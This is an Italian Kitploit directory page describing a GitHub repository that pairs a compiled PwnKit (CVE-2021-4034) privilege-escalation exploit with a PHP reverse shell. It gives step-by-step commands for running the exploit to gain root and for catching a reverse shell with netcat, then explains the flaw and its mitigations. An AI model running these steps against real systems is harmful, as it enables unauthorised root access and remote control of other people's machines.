Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
hack — Repository di ricerca sulla sicurezza contenente una Prova di Concetto (PoC) per la vulnerabilità CVE-2021-4034 (PwnKit) e utility di scripting per la dimostrazione di escalation dei privilegi ed esecuzione remota in ambienti Linux. | Kitploit
Strumenti/GitHubGitHub/jscamposx/hack
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubjscamposx/hack

hack

Repository di ricerca sulla sicurezza contenente una Prova di Concetto (PoC) per la vulnerabilità CVE-2021-4034 (PwnKit) e utility di scripting per la dimostrazione di escalation dei privilegi ed esecuzione remota in ambienti Linux.

Vedi Repository
1159 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

💀 PwnKit (CVE-2021-4034) e Reverse Shell Toolkit

Security Research CVE Language

⚠️ DISCLAIMER: Questo repository è stato creato esclusivamente per scopi educativi e di ricerca sulla sicurezza. L'autore non è responsabile dell'uso improprio di questi strumenti. Usalo solo in ambienti controllati o dove hai il permesso esplicito.


📜 Descrizione

Questo repository contiene un Proof of Concept (PoC) compilato per la vulnerabilità PwnKit (CVE-2021-4034), un difetto critico di escalation dei privilegi locale nel componente pkexec di Polkit.

Inoltre, è incluso uno script di Reverse Shell in PHP pronto per essere distribuito dopo lo sfruttamento o come vettore di accesso iniziale.

🎯 Obiettivo

Ottenere accesso root su sistemi Linux vulnerabili e stabilire persistenza o controllo remoto tramite una shell inversa.


📂 Contenuto dell'Arsenale

1. PwnKit (Binario ELF)

L'exploit compilato per CVE-2021-4034.

  • Funzione: Manipola le variabili d'ambiente di pkexec per caricare una libreria condivisa dannosa ed eseguire codice come root.
  • Architettura: x86_64 (Linux).
  • Dipendenze: Richiede che pkexec sia installato sul target.

2. reverseShell.php

Un payload leggero per stabilire una connessione inversa.

  • Configurazione attuale:
    • IP: 192.168.1.8
    • Porta: 4444
    • Shell: /bin/bash
  • Utilizzo: Può essere eseguito via CLI (php reverseShell.php) o iniettato in un server web vulnerabile.

🚀 Guida all'Uso

Fase 1: Escalation dei Privilegi (PwnKit)

  1. Trasferisci il binario PwnKit al sistema vittima.
  2. Dai i permessi di esecuzione:
    chmod +x PwnKit
    
  3. Esegui l'exploit:
    ./PwnKit
    
    Se ha successo, dovresti ottenere una shell con privilegi di root immediatamente.

Fase 2: Connessione Remota (Reverse Shell)

  1. Sulla tua macchina attaccante, avvia un listener con Netcat:
    nc -lvnp 4444
    
  2. Modifica reverseShell.php se il tuo IP è diverso da quello configurato di default.
  3. Esegui lo script sulla vittima (come utente normale o come root dopo aver usato PwnKit):
    php reverseShell.php
    

🛠️ Dettagli Tecnici (CVE-2021-4034)

Questa vulnerabilità risiede in come pkexec gestisce gli argomenti della riga di comando. Passando una lista di argomenti vuota, pkexec tenta di accedere a argv[1] fuori dai limiti, consentendo a un attaccante di sovrascrivere le variabili d'ambiente in memoria, in particolare iniettando una variabile GCONV_PATH dannosa per dirottare il flusso di esecuzione.

  • Data di divulgazione: Gennaio 2022.
  • Impatto: Accesso Root istantaneo nella maggior parte delle distribuzioni Linux predefinite (Ubuntu, Debian, Fedora, CentOS).

🛡️ Mitigazione

Per proteggersi da questo exploit:

  1. Aggiornare Polkit: Installa le patch di sicurezza fornite dalla tua distribuzione.
  2. Rimuovere il bit SUID (Soluzione temporanea):
    chmod 0755 /usr/bin/pkexec
    

Happy Hacking! 🏴‍☠️

Scarica lo strumento